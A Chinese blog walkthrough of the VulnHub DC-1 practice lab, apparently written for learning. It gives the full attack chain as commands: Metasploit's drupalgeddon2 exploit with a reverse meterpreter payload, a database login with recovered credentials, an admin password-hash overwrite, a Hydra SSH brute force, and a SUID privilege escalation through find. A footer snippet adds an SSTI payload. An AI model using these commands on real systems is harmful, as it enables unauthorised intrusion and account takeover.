DC-1--vulnhub靶场

已于 2022-08-06 03:32:02 修改
阅读量507 收藏
点赞数
分类专栏: vulnhub靶场笔记 文章标签: 安全 kali linux flag
于 2022-07-09 10:50:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46982383/article/details/125688194
版权

靶场地址

https://www.vulnhub.com/entry/dc-1-1,292/

记得看靶场描述,有5个flag
网络模式:NAT

目录

1、主机发现
nmap -T4 192.168.194.1/24 

nmap -T4 -sV -A 192.168.194.154

内容管理系统(content management system,CMS)
开放了22、80、111,先看下80端口,drupal 7
内容管理系统(content management system,CMS)主要包含:drupal、wordpress、joomla!

在这里插入图片描述

2、msf漏洞发现与利用
msfconsole -q 

search drupal 

use exploit/unix/webapp/drupal_drupalgeddon2 

show options 

set payload php/meterpreter/reverse_tcp

剩余设置看yes选项需求

set rhosts 192.168.194.154

利用

exploit

Alt
使用ls指令,发现flag1
在这里插入图片描述

查看flag1,有提示
切换到相应文件,发现flag2和数据库账号、密码
在这里插入图片描述

Python打开shell终端获取交互shell,登录mysql数据库
Shell

python -c 'import pty;pty.spawn("/bin/bash")'

mysql -udbuser -pR0ck3t

查看用户和密码

show databases;

use drupaldb;

select * from users;

select * from users\G;

在这里插入图片描述
发现被加密,生成新密码,用于更新密码,之前做过,前后密码一致了

在Drupal 7的安装目录中的scripts目录下,有一些Drupal
7开发者准备好的PHP脚本,可以执行一些高级操作。
其中有一个脚本名为:password-hash.sh,它的功能是传入一个密码(字符串),即返回
加密后的密码字符串。

在这里插入图片描述

 php scripts/password-hash.sh 123456

update users set pass="$S$DeZpFbTDj2bR.cRAXn80CjQun0bADXOMp/RGPmiw61EdqHr9g8YP" where name="admin";
3、账户登录,发现flag3

在这里插入图片描述

尝试查看/etc/shadow,权限不足
尝试查看一下 /etc/passwd,发现flag4是一个用户
在这里插入图片描述

4. 使用ssh登录flag4账户

Flag4是一个用户,flag4用户密码可以使用ssh登录进行爆破
Hydra破解,爆破成功

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt 192.168.194.154 ssh

在这里插入图片描述

ssh登录,得到flag4
在这里插入图片描述

5、find提权

找suid的程序

find / -type f -perm -u=s 2>/dev/null

发现find命令有suid权限,进行其利用提权

find ./ aaa -exec '/bin/sh' \;

在这里插入图片描述

在这里插入图片描述

完成后的补充

(1)添加用户,登录网站

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t
http://192.168.194.154 -u admin1 -p admin

(2)简洁版
先提权,再找剩余的flag

find / -type f -name flag1.txt
逆风/
关注
专栏目录
VulnHub DC-1
weixin_45682839的博客
04-13 354
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub-DC-1
KAKA的博客
06-04 915
配置信息: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1 (VirtualBox) IP:192.168.67.200 攻机:Kali (Local) IP:192.168.67.109 目标:获取5个flag 开始游戏: 扫描整个网段获取目标IP地址: nmap -sn 192.168.67.0/24 获取目标IP地址:192.168.67.200 扫描目标信息: nmap-A -p-1...
2021-07-09 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(liunx)
热门推荐
时光隧道
07-09 5万+
一:文件读取漏洞常见触发点 1.Web语言 不同的Web语言,其文件读取漏洞的触发点也会存在差异,本小节以读取不同Web文件漏洞为例进行介绍,具体的漏洞场景请读者自行查阅,在此不再赘述。 1.1 PHP PHP标准函数中有关文件读的部分不再详细介绍,这些函数包括但可能不限于:file_get_contents()、file()、fopen()函数(及其文件指针操作函数fread()、fgets()等),与文件包含相关的函数(include()、require()、include_once()、require
DC-1靶机的渗透学习
里丘~班诺的小屋
08-31 2787
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、找到kali的IP地址,用nmap扫描同一网段找到靶机的IP 一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
CTF 一些漏洞模式
qq_41996851的博客
05-10 901
SSTI模板注入 SSTI初探 SSTI 常用payload; {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1194
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
Vulnhub - DC-1
qq_46081990的博客
03-14 401
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2638
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag
vulnhub靶场DC-3
qq_58091216的博客
01-08 1342
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 366
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 844
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 635
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 994
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
消防指挥中心控制台:守护安全的关键枢纽
JiaDeLi_console的博客
09-11 335
它不仅是信息的接收者,更是行动的发起者,协调各方资源,确保消防救援工作高效、有序地进行。消防指挥中心控制台是消防救援工作的关键环节,它以先进的设计、强大的功能和不断升级的科技,为守护人民生命财产安全发挥着不可替代的作用。在未来,随着科技的进一步发展,相信消防指挥中心控制台将变得更加智能、高效,为构建更加安全的社会环境贡献更大的力量。同时,控制台还配备了舒适的座椅,为指挥人员提供良好的工作条件。在消防应急救援的战场上,嘉德立消防指挥中心控制台犹如一座坚实的堡垒,发挥着至关重要的作用。二、先进的设计与功能。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1594
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
企业如何构建有效的数据泄露防护安全体系
最新发布
A526847的博客
09-14 337
在当今数字化时代,企业数据已成为核心资产,其安全性直接关系到企业的竞争力、客户信任度以及法律合规性。数据泄露事件频发,不仅会导致经济损失,还可能损害企业声誉和客户关系。因此,构建有效的数据泄露防护安全体系已成为企业不可或缺的重要任务。
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值